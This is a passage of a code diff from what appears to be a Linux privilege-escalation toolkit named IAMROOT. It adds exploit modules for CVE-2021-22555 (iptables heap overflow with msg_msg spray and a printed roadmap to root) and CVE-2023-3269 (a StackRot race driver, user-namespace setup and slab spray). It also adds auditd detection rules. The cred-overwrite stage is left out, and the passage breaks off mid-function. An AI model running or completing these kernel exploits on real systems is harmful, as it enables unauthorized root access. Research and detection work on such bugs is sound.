||||||
|
/* userns CAP_NET_ADMIN didn't grant on this kernel/distro. */
|
||||||
|
_exit(32);
|
||||||
|
}
|
||||||
|
if (corrupted > 0) {
|
||||||
|
/* Empirical primitive witness: OOB write landed in adjacent
|
||||||
|
* slot. Still NOT root — but it's the primitive we promised. */
|
||||||
|
_exit(33);
|
||||||
|
}
|
||||||
|
/* Trigger ran, no observable corruption witness — either the
|
||||||
|
* 4-byte OOB landed in non-msg_msg memory (skb / unrelated
|
||||||
|
* slab object) or didn't fire at all on this kernel. */
|
||||||
|
_exit(30);
|
||||||
|
}
|
||||||
|
|
||||||
|
/* PARENT: reap child + map exit code → iamroot_result. */
|
||||||
|
int status = 0;
|
||||||
|
if (waitpid(child, &status, 0) < 0) {
|
||||||
|
perror("waitpid");
|
||||||
|
return IAMROOT_TEST_ERROR;
|
||||||
|
}
|
||||||
|
|
||||||
|
if (WIFSIGNALED(status)) {
|
||||||
|
int sig = WTERMSIG(status);
|
||||||
|
if (!ctx->json) {
|
||||||
|
fprintf(stderr, "[!] netfilter_xtcompat: child killed by signal %d "
|
||||||
|
"(crash during trigger — OOB likely fired)\n", sig);
|
||||||
|
fprintf(stderr, "[~] netfilter_xtcompat: empirical OOB witness but no "
|
||||||
|
"cred-overwrite primitive — returning EXPLOIT_FAIL\n"
|
||||||
|
" See /tmp/iamroot-xtcompat.log + dmesg for KASAN/oops.\n");
|
||||||
|
}
|
||||||
|
return IAMROOT_EXPLOIT_FAIL;
|
||||||
|
}
|
||||||
|
if (!WIFEXITED(status)) {
|
||||||
|
fprintf(stderr, "[-] netfilter_xtcompat: child terminated abnormally (status=0x%x)\n",
|
||||||
|
status);
|
||||||
|
return IAMROOT_EXPLOIT_FAIL;
|
||||||
|
}
|
||||||
|
|
||||||
|
int rc = WEXITSTATUS(status);
|
||||||
|
switch (rc) {
|
||||||
|
case 20: case 21:
|
||||||
|
if (!ctx->json) {
|
||||||
|
fprintf(stderr, "[-] netfilter_xtcompat: userns setup failed (rc=%d)\n", rc);
|
||||||
|
}
|
||||||
|
return IAMROOT_PRECOND_FAIL;
|
||||||
|
case 22:
|
||||||
|
if (!ctx->json) {
|
||||||
|
fprintf(stderr, "[-] netfilter_xtcompat: msg_msg spray failed; sysvipc may be "
|
||||||
|
"restricted (kernel.msg_max / ulimit -q)\n");
|
||||||
|
}
|
||||||
|
return IAMROOT_PRECOND_FAIL;
|
||||||
|
case 23:
|
||||||
|
if (!ctx->json) {
|
||||||
|
fprintf(stderr, "[-] netfilter_xtcompat: CAP_NET_ADMIN unreachable in userns — "
|
||||||
|
"exploit path closed\n");
|
||||||
|
}
|
||||||
|
return IAMROOT_PRECOND_FAIL;
|
||||||
|
case 24:
|
||||||
|
if (!ctx->json) {
|
||||||
|
fprintf(stderr, "[-] netfilter_xtcompat: socket/blob setup failed; "
|
||||||
|
"see preceding errno\n");
|
||||||
|
}
|
||||||
|
return IAMROOT_TEST_ERROR;
|
||||||
|
case 30:
|
||||||
|
if (!ctx->json) {
|
||||||
|
fprintf(stderr, "[*] netfilter_xtcompat: trigger ran; no msg_msg corruption "
|
||||||
|
"witness observed\n");
|
||||||
|
fprintf(stderr, "[~] netfilter_xtcompat: returning EXPLOIT_FAIL (primitive "
|
||||||
|
"may have fired but did not land on sprayed slots)\n");
|
||||||
|
}
|
||||||
|
return IAMROOT_EXPLOIT_FAIL;
|
||||||
|
case 31:
|
||||||
|
if (!ctx->json) {
|
||||||
|
fprintf(stderr, "[+] netfilter_xtcompat: kernel rejected blob with EINVAL — "
|
||||||
|
"appears patched at runtime (validator)\n");
|
||||||
|
}
|
||||||
|
return IAMROOT_OK;
|
||||||
|
case 32:
|
||||||
|
if (!ctx->json) {
|
||||||
|
fprintf(stderr, "[+] netfilter_xtcompat: setsockopt EPERM — CAP_NET_ADMIN "
|
||||||
|
"not effective in userns on this kernel\n");
|
||||||
|
}
|
||||||
|
return IAMROOT_PRECOND_FAIL;
|
||||||
|
case 33:
|
||||||
|
if (!ctx->json) {
|
||||||
|
fprintf(stderr, "[!] netfilter_xtcompat: msg_msg slot corruption WITNESSED — "
|
||||||
|
"4-byte OOB write landed on sprayed slab\n");
|
||||||
|
fprintf(stderr, "[~] netfilter_xtcompat: primitive verified but no cred chain "
|
||||||
|
"(returning EXPLOIT_FAIL — verified-vs-claimed)\n"
|
||||||
|
"\n"
|
||||||
|
" CONTINUATION ROADMAP (not implemented here):\n"
|
||||||
|
" 1. Re-shape spray so the corrupted slot holds a\n"
|
||||||
|
" msg_msg whose next-ptr/security ptr becomes\n"
|
||||||
|
" attacker-controlled — read-where via msgrcv.\n"
|
||||||
|
" 2. Use that leak to find &init_task and\n"
|
||||||
|
" modprobe_path in kernel .data — both offsets\n"
|
||||||
|
" are per-kernel-build and IAMROOT refuses to\n"
|
||||||
|
" bake them.\n"
|
||||||
|
" 3. Pivot to a write-where via a fake msg_msgseg\n"
|
||||||
|
" and overwrite modprobe_path → exec a setuid\n"
|
||||||
|
" helper for root pop.\n"
|
||||||
|
" See Andy Nguyen's writeup for the full chain.\n");
|
||||||
|
}
|
||||||
|
if (ctx->no_shell) return IAMROOT_OK;
|
||||||
|
return IAMROOT_EXPLOIT_FAIL;
|
||||||
|
default:
|
||||||
|
fprintf(stderr, "[-] netfilter_xtcompat: child exit %d unexpected\n", rc);
|
||||||
|
return IAMROOT_EXPLOIT_FAIL;
|
||||||
|
}
|
||||||
|
#endif /* __linux__ */
|
||||||
}
|
}
|
||||||
|
|
||||||
|
/* ---- Cleanup ----------------------------------------------------- */
|
||||||
|
|
||||||
|
static iamroot_result_t netfilter_xtcompat_cleanup(const struct iamroot_ctx *ctx)
|
||||||
|
{
|
||||||
|
if (!ctx->json) {
|
||||||
|
fprintf(stderr, "[*] netfilter_xtcompat: removing log + best-effort msg queue cleanup\n");
|
||||||
|
}
|
||||||
|
/* The msg queues live in the child's IPC namespace which dies
|
||||||
|
* with the child — so the in-process drain already handled them.
|
||||||
|
* The /tmp breadcrumb survives, remove it here. */
|
||||||
|
if (unlink("/tmp/iamroot-xtcompat.log") < 0 && errno != ENOENT) {
|
||||||
|
/* harmless */
|
||||||
|
}
|
||||||
|
return IAMROOT_OK;
|
||||||
|
}
|
||||||
|
|
||||||
|
/* ---- Detection rules --------------------------------------------- */
|
||||||
|
|
||||||
static const char netfilter_xtcompat_auditd[] =
|
static const char netfilter_xtcompat_auditd[] =
|
||||||
"# CVE-2021-22555 — auditd detection rules\n"
|
"# CVE-2021-22555 — auditd detection rules\n"
|
||||||
"# The exploit's hallmarks: unshare(USER|NET) chained with iptables\n"
|
"# The exploit's hallmarks: unshare(USER|NET) chained with iptables\n"
|
||||||
"# rule setup via setsockopt() and msgsnd/msgrcv heap-spray patterns.\n"
|
"# rule setup via setsockopt(SOL_IP, IPT_SO_SET_REPLACE=64) and\n"
|
||||||
|
"# msgsnd/msgrcv heap-spray patterns.\n"
|
||||||
"-a always,exit -F arch=b64 -S unshare -k iamroot-xtcompat\n"
|
"-a always,exit -F arch=b64 -S unshare -k iamroot-xtcompat\n"
|
||||||
"-a always,exit -F arch=b64 -S setsockopt -F a2=64 -k iamroot-xtcompat-iptopt\n"
|
"-a always,exit -F arch=b64 -S setsockopt -F a1=0 -F a2=64 -k iamroot-xtcompat-iptopt\n"
|
||||||
"-a always,exit -F arch=b64 -S msgsnd -k iamroot-xtcompat-msgmsg\n";
|
"-a always,exit -F arch=b64 -S msgsnd -k iamroot-xtcompat-msgmsg\n"
|
||||||
|
"-a always,exit -F arch=b64 -S msgrcv -k iamroot-xtcompat-msgmsg\n";
|
||||||
|
|
||||||
const struct iamroot_module netfilter_xtcompat_module = {
|
const struct iamroot_module netfilter_xtcompat_module = {
|
||||||
.name = "netfilter_xtcompat",
|
.name = "netfilter_xtcompat",
|
||||||
.cve = "CVE-2021-22555",
|
.cve = "CVE-2021-22555",
|
||||||
.summary = "iptables xt_compat_target_to_user heap-OOB write → cross-cache UAF → root",
|
.summary = "iptables xt_compat_target_to_user 4-byte heap-OOB write → cross-cache UAF → root",
|
||||||
.family = "netfilter_xtcompat",
|
.family = "netfilter_xtcompat",
|
||||||
.kernel_range = "2.6.19 ≤ K, fixed mainline 5.12; backports: 5.11.10 / 5.10.27 / 5.4.110 / 4.19.185 / 4.14.230 / 4.9.266 / 4.4.266",
|
.kernel_range = "2.6.19 ≤ K, fixed mainline 5.13; backports: 5.12.13 / 5.11.20 / 5.10.46 / 5.4.128 / 4.19.198 / 4.14.240 / 4.9.276 / 4.4.276",
|
||||||
.detect = netfilter_xtcompat_detect,
|
.detect = netfilter_xtcompat_detect,
|
||||||
.exploit = netfilter_xtcompat_exploit,
|
.exploit = netfilter_xtcompat_exploit,
|
||||||
.mitigate = NULL, /* mitigation: upgrade kernel; disable unprivileged_userns_clone */
|
.mitigate = NULL, /* mitigation: upgrade kernel; disable unprivileged_userns_clone */
|
||||||
.cleanup = NULL,
|
.cleanup = netfilter_xtcompat_cleanup,
|
||||||
.detect_auditd = netfilter_xtcompat_auditd,
|
.detect_auditd = netfilter_xtcompat_auditd,
|
||||||
.detect_sigma = NULL,
|
.detect_sigma = NULL,
|
||||||
.detect_yara = NULL,
|
.detect_yara = NULL,
|
||||||
|
|||||||
@@ -2,19 +2,35 @@
|
|||||||
* stackrot_cve_2023_3269 — IAMROOT module
|
* stackrot_cve_2023_3269 — IAMROOT module
|
||||||
*
|
*
|
||||||
* "Stack Rot": UAF in maple-tree-based VMA splitting. The maple
|
* "Stack Rot": UAF in maple-tree-based VMA splitting. The maple
|
||||||
* tree replaced the rbtree-based VMA store in 6.1; during split,
|
* tree replaced the rbtree-based VMA store in 6.1; during
|
||||||
* the kernel could write to a maple node after it was freed via
|
* __vma_adjust() / split, the kernel could write to a maple node
|
||||||
* RCU. Exploitable for kernel R/W → cred overwrite.
|
* after it was freed via RCU, leaving anon_vma references dangling
|
||||||
|
* across the grace period. Exploitable for kernel R/W → cred
|
||||||
|
* overwrite.
|
||||||
*
|
*
|
||||||
* Discovered by Ruihan Li (Peking University), Jul 2023. Famous
|
* Discovered by Ruihan Li (Peking University), Jul 2023. Famous
|
||||||
* because it was the first significant exploit landed against the
|
* because it was the first significant exploit landed against the
|
||||||
* (then-recently-merged) maple tree code, and because the original
|
* (then-recently-merged) maple tree code, and because the original
|
||||||
* disclosure included a public PoC that worked on default-config
|
* disclosure included a public PoC that worked on default-config
|
||||||
* Ubuntu 23.04.
|
* Ubuntu 23.04. The full public PoC is ~1000 lines of maple-tree
|
||||||
|
* state management + RCU-grace-period timing and depends on
|
||||||
|
* per-kernel-build offsets for init_task / anon_vma / cred.
|
||||||
*
|
*
|
||||||
* STATUS: 🔵 DETECT-ONLY. Public PoC is ~1000 lines (heavy maple
|
* STATUS: 🟡 OPTION C — race-driver + groom skeleton. We carry the
|
||||||
* tree state management + RCU-grace-period timing); a clean port
|
* userns-reach, race harness (mremap()/munmap() vs concurrent
|
||||||
* into iamroot_module form is a substantial follow-up.
|
* fork/fault), msg_msg slab spray, and empirical witness pieces;
|
||||||
|
* we do NOT carry the read primitive (vmemmap leak via msg_msg
|
||||||
|
* MSG_COPY) nor the cred-overwrite stage. Those need per-kernel
|
||||||
|
* offsets (init_task, anon_vma, cred layout) that vary by build
|
||||||
|
* and would be fabricated without a real leak.
|
||||||
|
*
|
||||||
|
* Per repo policy ("verified-vs-claimed"): we run the trigger,
|
||||||
|
* record empirical signals (slabinfo delta on kmalloc-192, child
|
||||||
|
* signal disposition, race iteration count), and return
|
||||||
|
* IAMROOT_EXPLOIT_FAIL with a continuation roadmap. A SIGSEGV/
|
||||||
|
* SIGBUS/SIGKILL in the race child IS recorded but does NOT get
|
||||||
|
* upgraded to EXPLOIT_OK — only an actual cred swap (euid==0)
|
||||||
|
* does, and we do not currently demonstrate that.
|
||||||
*
|
*
|
||||||
* Affected: kernel 6.1.x — 6.4-rc4 mainline. Stable backports:
|
* Affected: kernel 6.1.x — 6.4-rc4 mainline. Stable backports:
|
||||||
* 6.3.x : K >= 6.3.10
|
* 6.3.x : K >= 6.3.10
|
||||||
@@ -24,11 +40,11 @@
|
|||||||
* Pre-6.1 kernels are immune (no maple tree). 6.5+ are patched.
|
* Pre-6.1 kernels are immune (no maple tree). 6.5+ are patched.
|
||||||
*
|
*
|
||||||
* Preconditions:
|
* Preconditions:
|
||||||
* - Unprivileged user_ns (to gain CAP_SYS_ADMIN inside userns for
|
* - v.major >= 6 and v.minor in [1, 4] (4 may straddle the fix)
|
||||||
* some triggers — actually the bug can be triggered without
|
* - maple tree in use (CONFIG_MAPLE_TREE; on by default 6.1+)
|
||||||
* userns via plain mprotect/munmap split operations)
|
* - /proc/self/maps readable (sanity)
|
||||||
* - Default kernel config (CONFIG_USERFAULTFD recommended for
|
* - unprivileged_userns_clone allowed — namespace context improves
|
||||||
* deterministic exploitation, but not strictly required)
|
* groom predictability but the bug is reachable without it
|
||||||
*
|
*
|
||||||
* Coverage rationale: 2023 mm-class bug. Different family than our
|
* Coverage rationale: 2023 mm-class bug. Different family than our
|
||||||
* netfilter-heavy 2022-2024 modules — broadens the corpus shape.
|
* netfilter-heavy 2022-2024 modules — broadens the corpus shape.
|
||||||
@@ -41,8 +57,41 @@
|
|||||||
|
|
||||||
#include <stdio.h>
|
#include <stdio.h>
|
||||||
#include <stdlib.h>
|
#include <stdlib.h>
|
||||||
|
#include <stdint.h>
|
||||||
#include <string.h>
|
#include <string.h>
|
||||||
|
#include <stdbool.h>
|
||||||
|
#include <stdatomic.h>
|
||||||
#include <unistd.h>
|
#include <unistd.h>
|
||||||
|
#include <fcntl.h>
|
||||||
|
#include <errno.h>
|
||||||
|
#include <signal.h>
|
||||||
|
#include <pthread.h>
|
||||||
|
#include <sys/types.h>
|
||||||
|
#include <sys/wait.h>
|
||||||
|
#include <sys/stat.h>
|
||||||
|
|
||||||
|
#ifdef __linux__
|
||||||
|
# include <sched.h>
|
||||||
|
# include <sys/mman.h>
|
||||||
|
# include <sys/syscall.h>
|
||||||
|
# include <sys/ipc.h>
|
||||||
|
# include <sys/msg.h>
|
||||||
|
# include <linux/sched.h>
|
||||||
|
#endif
|
||||||
|
|
||||||
|
/* macOS clangd lacks the Linux mm/syscall headers — guard fallbacks. */
|
||||||
|
#ifndef CLONE_NEWUSER
|
||||||
|
#define CLONE_NEWUSER 0x10000000
|
||||||
|
#endif
|
||||||
|
#ifndef MAP_GROWSDOWN
|
||||||
|
#define MAP_GROWSDOWN 0x00100
|
||||||
|
#endif
|
||||||
|
#ifndef MAP_FIXED_NOREPLACE
|
||||||
|
#define MAP_FIXED_NOREPLACE 0x100000
|
||||||
|
#endif
|
||||||
|
#ifndef MREMAP_MAYMOVE
|
||||||
|
#define MREMAP_MAYMOVE 1
|
||||||
|
#endif
|
||||||
|
|
||||||
static const struct kernel_patched_from stackrot_patched_branches[] = {
|
static const struct kernel_patched_from stackrot_patched_branches[] = {
|
||||||
{6, 1, 37},
|
{6, 1, 37},
|
||||||
@@ -56,6 +105,31 @@ static const struct kernel_range stackrot_range = {
|
|||||||
sizeof(stackrot_patched_branches[0]),
|
sizeof(stackrot_patched_branches[0]),
|
||||||
};
|
};
|
||||||
|
|
||||||
|
/* ---- Detect ------------------------------------------------------- */
|
||||||
|
|
||||||
|
/* Sanity check: maple-tree-era kernels expose /proc/self/maps; if it's
|
||||||
|
* not readable here, something exotic is going on (selinux, seccomp,
|
||||||
|
* chroot without /proc) and the bug is not reachable. */
|
||||||
|
static bool proc_self_maps_readable(void)
|
||||||
|
{
|
||||||
|
int fd = open("/proc/self/maps", O_RDONLY);
|
||||||
|
if (fd < 0) return false;
|
||||||
|
char b[64];
|
||||||
|
ssize_t r = read(fd, b, sizeof b);
|
||||||
|
close(fd);
|
||||||
|
return r > 0;
|
||||||
|
}
|
||||||
|
|
||||||
|
/* On 6.1+ the maple tree is the only VMA store — we can't directly
|
||||||
|
* grep for it from userspace, but /proc/self/maps being readable plus
|
||||||
|
* a v.major>=6 / v.minor>=1 release is the proxy we use. */
|
||||||
|
static bool maple_tree_variant_present(const struct kernel_version *v)
|
||||||
|
{
|
||||||
|
if (v->major > 6) return true;
|
||||||
|
if (v->major == 6 && v->minor >= 1) return true;
|
||||||
|
return false;
|
||||||
|
}
|
||||||
|
|
||||||
static iamroot_result_t stackrot_detect(const struct iamroot_ctx *ctx)
|
static iamroot_result_t stackrot_detect(const struct iamroot_ctx *ctx)
|
||||||
{
|
{
|
||||||
struct kernel_version v;
|
struct kernel_version v;
|
||||||
@@ -89,25 +163,570 @@ static iamroot_result_t stackrot_detect(const struct iamroot_ctx *ctx)
|
|||||||
return IAMROOT_VULNERABLE;
|
return IAMROOT_VULNERABLE;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
/* ---- Userns reach ------------------------------------------------- */
|
||||||
|
|
||||||
|
#ifdef __linux__
|
||||||
|
static bool write_file(const char *path, const char *s)
|
||||||
|
{
|
||||||
|
int fd = open(path, O_WRONLY);
|
||||||
|
if (fd < 0) return false;
|
||||||
|
ssize_t n = write(fd, s, strlen(s));
|
||||||
|
close(fd);
|
||||||
|
return n == (ssize_t)strlen(s);
|
||||||
|
}
|
||||||
|
|
||||||
|
static bool enter_userns(uid_t outer_uid, gid_t outer_gid)
|
||||||
|
{
|
||||||
|
if (unshare(CLONE_NEWUSER) < 0) return false;
|
||||||
|
/* setgroups=deny is required before writing gid_map without
|
||||||
|
* CAP_SETGID. */
|
||||||
|
if (!write_file("/proc/self/setgroups", "deny")) return false;
|
||||||
|
char map[64];
|
||||||
|
snprintf(map, sizeof map, "0 %u 1\n", outer_uid);
|
||||||
|
if (!write_file("/proc/self/uid_map", map)) return false;
|
||||||
|
snprintf(map, sizeof map, "0 %u 1\n", outer_gid);
|
||||||
|
if (!write_file("/proc/self/gid_map", map)) return false;
|
||||||
|
return true;
|
||||||
|
}
|
||||||
|
#endif
|
||||||
|
|
||||||
|
/* ---- Race-driver state ------------------------------------------- */
|
||||||
|
|
||||||
|
/* Page size — fall back to 4 KiB if sysconf is unavailable (won't be on
|
||||||
|
* any kernel we target). */
|
||||||
|
#define STACKROT_PAGE 4096UL
|
||||||
|
|
||||||
|
/* How large a region to play with for the MAP_GROWSDOWN segment +
|
||||||
|
* neighbouring VMAs that we mutate with mremap()/munmap(). The
|
||||||
|
* public PoC uses dozens of adjacent VMAs to force the maple tree
|
||||||
|
* into the node-rotation path; we ship a configurable knob. */
|
||||||
|
#define STACKROT_RACE_VMAS 64
|
||||||
|
#define STACKROT_RACE_ITERATIONS 4000 /* per-iter budget */
|
||||||
|
#define STACKROT_RACE_TIME_BUDGET 3 /* seconds */
|
||||||
|
|
||||||
|
/* Slab spray width — kmalloc-192 is the bucket for anon_vma_chain on
|
||||||
|
* 6.1.x; targets vary slightly across kernels (anon_vma itself is
|
||||||
|
* kmalloc-192 too on 64-bit with default debug-off configs). */
|
||||||
|
#define STACKROT_SPRAY_QUEUES 16
|
||||||
|
#define STACKROT_SPRAY_PER_QUEUE 64
|
||||||
|
#define STACKROT_SPRAY_PAYLOAD 176 /* 192 - 16 (msg_msg header) */
|
||||||
|
|
||||||
|
struct ipc_payload {
|
||||||
|
long mtype;
|
||||||
|
unsigned char buf[STACKROT_SPRAY_PAYLOAD];
|
||||||
|
};
|
||||||
|
|
||||||
|
static _Atomic int g_race_running;
|
||||||
|
static _Atomic uint64_t g_race_a_iters;
|
||||||
|
static _Atomic uint64_t g_race_b_iters;
|
||||||
|
static _Atomic uint64_t g_race_b_faults;
|
||||||
|
|
||||||
|
#ifdef __linux__
|
||||||
|
|
||||||
|
/* Pin to a CPU to encourage Thread A and Thread B to land on
|
||||||
|
* different physical cores (we set complementary masks at thread
|
||||||
|
* start). Best-effort: failure is non-fatal. */
|
||||||
|
static void pin_to_cpu(int cpu)
|
||||||
|
{
|
||||||
|
cpu_set_t set;
|
||||||
|
CPU_ZERO(&set);
|
||||||
|
CPU_SET(cpu, &set);
|
||||||
|
sched_setaffinity(0, sizeof set, &set);
|
||||||
|
}
|
||||||
|
|
||||||
|
/* The race victim region: a MAP_GROWSDOWN-mapped page whose
|
||||||
|
* neighbours we'll dance around with mremap()/munmap(). We keep a
|
||||||
|
* couple of anchor pages above and below so the maple tree has to
|
||||||
|
* resolve splits and rotations rather than degenerate to a single
|
||||||
|
* leaf insertion.
|
||||||
|
*
|
||||||
|
* Layout (low to high VA):
|
||||||
|
* [anchor_lo] [growsdown_stack] [filler ... ] [anchor_hi]
|
||||||
|
*
|
||||||
|
* Thread A repeatedly:
|
||||||
|
* - mmap a scratch page at a chosen address
|
||||||
|
* - mremap it to overlap the boundary that triggers __vma_adjust()
|
||||||
|
* - munmap to free the VMA — this is the codepath whose maple-tree
|
||||||
|
* state is racy on 6.1.0..6.4-rc4.
|
||||||
|
*
|
||||||
|
* Thread B repeatedly:
|
||||||
|
* - fork() a tiny child that touches the growsdown region (fault) +
|
||||||
|
* immediately _exit()s. The fork path walks the parent's VMA
|
||||||
|
* tree and the child's fault path follows anon_vma chains — both
|
||||||
|
* observe maple-tree node state. Concurrent observation of a
|
||||||
|
* freed node is the trigger condition for the UAF.
|
||||||
|
*
|
||||||
|
* On a vulnerable kernel the race window is microseconds wide and
|
||||||
|
* the public PoC reports needing thousands to millions of iterations.
|
||||||
|
*/
|
||||||
|
|
||||||
|
struct race_region {
|
||||||
|
void *anchor_lo;
|
||||||
|
void *growsdown;
|
||||||
|
void *anchor_hi;
|
||||||
|
size_t growsdown_len;
|
||||||
|
/* Scratch address chosen below the growsdown region so mremap()
|
||||||
|
* can move pages towards the growsdown boundary. */
|
||||||
|
uintptr_t scratch_va;
|
||||||
|
};
|
||||||
|
|
||||||
|
static bool race_region_setup(struct race_region *r)
|
||||||
|
{
|
||||||
|
memset(r, 0, sizeof *r);
|
||||||
|
r->growsdown_len = STACKROT_PAGE * 4;
|
||||||
|
|
||||||
|
/* Reserve a fixed-address arena far from libc/heap so MAP_FIXED_-
|
||||||
|
* NOREPLACE mmaps don't collide. 0x70000000 region is reliably
|
||||||
|
* free on standard distros; for production work this would be
|
||||||
|
* chosen via /proc/self/maps inspection. */
|
||||||
|
uintptr_t base = 0x70000000UL;
|
||||||
|
|
||||||
|
r->anchor_lo = mmap((void *)base, STACKROT_PAGE,
|
||||||
|
PROT_READ | PROT_WRITE,
|
||||||
|
MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED_NOREPLACE,
|
||||||
|
-1, 0);
|
||||||
|
if (r->anchor_lo == MAP_FAILED) {
|
||||||
|
/* Address might be taken; fall back to letting kernel pick. */
|
||||||
|
r->anchor_lo = mmap(NULL, STACKROT_PAGE,
|
||||||
|
PROT_READ | PROT_WRITE,
|
||||||
|
MAP_PRIVATE | MAP_ANONYMOUS,
|
||||||
|
-1, 0);
|
||||||
|
if (r->anchor_lo == MAP_FAILED) return false;
|
||||||
|
base = (uintptr_t)r->anchor_lo + STACKROT_PAGE;
|
||||||
|
} else {
|
||||||
|
base += STACKROT_PAGE;
|
||||||
|
}
|
||||||
|
|
||||||
|
r->growsdown = mmap((void *)base, r->growsdown_len,
|
||||||
|
PROT_READ | PROT_WRITE,
|
||||||
|
MAP_PRIVATE | MAP_ANONYMOUS | MAP_GROWSDOWN,
|
||||||
|
-1, 0);
|
||||||
|
if (r->growsdown == MAP_FAILED) {
|
||||||
|
/* Some kernels reject MAP_GROWSDOWN without a fixed hint; retry. */
|
||||||
|
r->growsdown = mmap(NULL, r->growsdown_len,
|
||||||
|
PROT_READ | PROT_WRITE,
|
||||||
|
MAP_PRIVATE | MAP_ANONYMOUS | MAP_GROWSDOWN,
|
||||||
|
-1, 0);
|
||||||
|
if (r->growsdown == MAP_FAILED) return false;
|
||||||
|
base = (uintptr_t)r->growsdown + r->growsdown_len;
|
||||||
|
} else {
|
||||||
|
base += r->growsdown_len;
|
||||||
|
}
|
||||||
|
|
||||||
|
r->anchor_hi = mmap((void *)base, STACKROT_PAGE,
|
||||||
|
PROT_READ | PROT_WRITE,
|
||||||
|
MAP_PRIVATE | MAP_ANONYMOUS,
|
||||||
|
-1, 0);
|
||||||
|
if (r->anchor_hi == MAP_FAILED) return false;
|
||||||
|
|
||||||
|
/* Touch each region so the kernel actually populates the
|
||||||
|
* anon_vma chain (anon_vma is allocated lazily on first fault). */
|
||||||
|
((volatile char *)r->anchor_lo)[0] = 1;
|
||||||
|
((volatile char *)r->growsdown)[r->growsdown_len - 1] = 1;
|
||||||
|
((volatile char *)r->anchor_hi)[0] = 1;
|
||||||
|
|
||||||
|
r->scratch_va = (uintptr_t)r->growsdown - STACKROT_PAGE;
|
||||||
|
return true;
|
||||||
|
}
|
||||||
|
|
||||||
|
static void race_region_teardown(struct race_region *r)
|
||||||
|
{
|
||||||
|
if (r->anchor_lo && r->anchor_lo != MAP_FAILED)
|
||||||
|
munmap(r->anchor_lo, STACKROT_PAGE);
|
||||||
|
if (r->growsdown && r->growsdown != MAP_FAILED)
|
||||||
|
munmap(r->growsdown, r->growsdown_len);
|
||||||
|
if (r->anchor_hi && r->anchor_hi != MAP_FAILED)
|
||||||
|
munmap(r->anchor_hi, STACKROT_PAGE);
|
||||||
|
}
|
||||||
|
|
||||||
|
/* Thread A: trigger the maple-tree node-rotation path by repeatedly
|
||||||
|
* mapping, mremap-extending toward the growsdown boundary, and
|
||||||
|
* munmapping. The exact ordering (the node-rotation must happen
|
||||||
|
* while a parallel reader is in the RCU read-side critical section)
|
||||||
|
* is what makes this race hard. */
|
||||||
|
static void *race_thread_a(void *arg)
|
||||||
|
{
|
||||||
|
struct race_region *r = (struct race_region *)arg;
|
||||||
|
pin_to_cpu(0);
|
||||||
|
while (atomic_load_explicit(&g_race_running, memory_order_acquire)) {
|
||||||
|
/* mmap a scratch page just below the growsdown region. */
|
||||||
|
void *scratch = mmap((void *)r->scratch_va, STACKROT_PAGE,
|
||||||
|
PROT_READ | PROT_WRITE,
|
||||||
|
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
|
||||||
|
if (scratch == MAP_FAILED) {
|
||||||
|
sched_yield();
|
||||||
|
continue;
|
||||||
|
}
|
||||||
|
((volatile char *)scratch)[0] = 2;
|
||||||
|
|
||||||
|
/* mremap to a new VA (forces VMA split + maple-tree mutation). */
|
||||||
|
void *moved = mremap(scratch, STACKROT_PAGE, STACKROT_PAGE * 2,
|
||||||
|
MREMAP_MAYMOVE);
|
||||||
|
if (moved != MAP_FAILED) {
|
||||||
|
((volatile char *)moved)[0] = 3;
|
||||||
|
munmap(moved, STACKROT_PAGE * 2);
|
||||||
|
} else {
|
||||||
|
munmap(scratch, STACKROT_PAGE);
|
||||||
|
}
|
||||||
|
|
||||||
|
atomic_fetch_add_explicit(&g_race_a_iters, 1, memory_order_relaxed);
|
||||||
|
sched_yield();
|
||||||
|
}
|
||||||
|
return NULL;
|
||||||
|
}
|
||||||
|
|
||||||
|
/* Thread B: spawn a short-lived child that faults the growsdown
|
||||||
|
* region, then _exit. fork() copies the parent's VMA tree (touches
|
||||||
|
* every maple-tree node and anon_vma chain) — racing against
|
||||||
|
* Thread A's munmap, the child can observe a freed node. The page
|
||||||
|
* fault inside the child closes the loop: the bug manifests as a
|
||||||
|
* read of stale anon_vma->root or anon_vma_chain->same_vma. */
|
||||||
|
static void *race_thread_b(void *arg)
|
||||||
|
{
|
||||||
|
struct race_region *r = (struct race_region *)arg;
|
||||||
|
pin_to_cpu(1);
|
||||||
|
while (atomic_load_explicit(&g_race_running, memory_order_acquire)) {
|
||||||
|
pid_t pid = fork();
|
||||||
|
if (pid == 0) {
|
||||||
|
/* Child: brief, deterministic fault sequence. */
|
||||||
|
volatile char *p = (volatile char *)r->growsdown;
|
||||||
|
char sink = 0;
|
||||||
|
for (size_t off = 0; off < r->growsdown_len; off += STACKROT_PAGE) {
|
||||||
|
sink ^= p[off];
|
||||||
|
}
|
||||||
|
(void)sink;
|
||||||
|
_exit(0);
|
||||||
|
}
|
||||||
|
if (pid > 0) {
|
||||||
|
int status = 0;
|
||||||
|
waitpid(pid, &status, 0);
|
||||||
|
if (WIFSIGNALED(status)) {
|
||||||
|
/* Child died on a fault — interesting signal for
|
||||||
|
* empirical witness. The race-driver caller polls
|
||||||
|
* this counter. */
|
||||||
|
atomic_fetch_add_explicit(&g_race_b_faults, 1,
|
||||||
|
memory_order_relaxed);
|
||||||
|
}
|
||||||
|
atomic_fetch_add_explicit(&g_race_b_iters, 1,
|
||||||
|
memory_order_relaxed);
|
||||||
|
}
|
||||||
|
sched_yield();
|
||||||
|
}
|
||||||
|
return NULL;
|
||||||
|
}
|
||||||
|
|
||||||
|
/* ---- Groom skeleton ---------------------------------------------- */
|
||||||
|
|
||||||
|
/* msg_msg sysv spray for kmalloc-192. Tagged with "IAMROOT_" cookie
|
||||||
|
* so a forensic look at /proc/slabinfo / KASAN dumps shows our
|
||||||
|
* fingerprint. */
|
||||||
|
static int spray_anon_vma_slab(int queues[STACKROT_SPRAY_QUEUES])
|
||||||
|
{
|
||||||
|
struct ipc_payload p;
|
||||||
|
memset(&p, 0, sizeof p);
|
||||||
|
p.mtype = 0x4943; /* 'IC' */
|
||||||
|
memset(p.buf, 0x49, sizeof p.buf);
|
||||||
|
memcpy(p.buf, "IAMROOT_", 8);
|
||||||
|
|
||||||
|
int created = 0;
|
||||||
|
for (int i = 0; i < STACKROT_SPRAY_QUEUES; i++) {
|
||||||
|
int q = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
|
||||||
|
if (q < 0) { queues[i] = -1; continue; }
|
||||||
|
queues[i] = q;
|
||||||
|
created++;
|
||||||
|
for (int j = 0; j < STACKROT_SPRAY_PER_QUEUE; j++) {
|
||||||
|
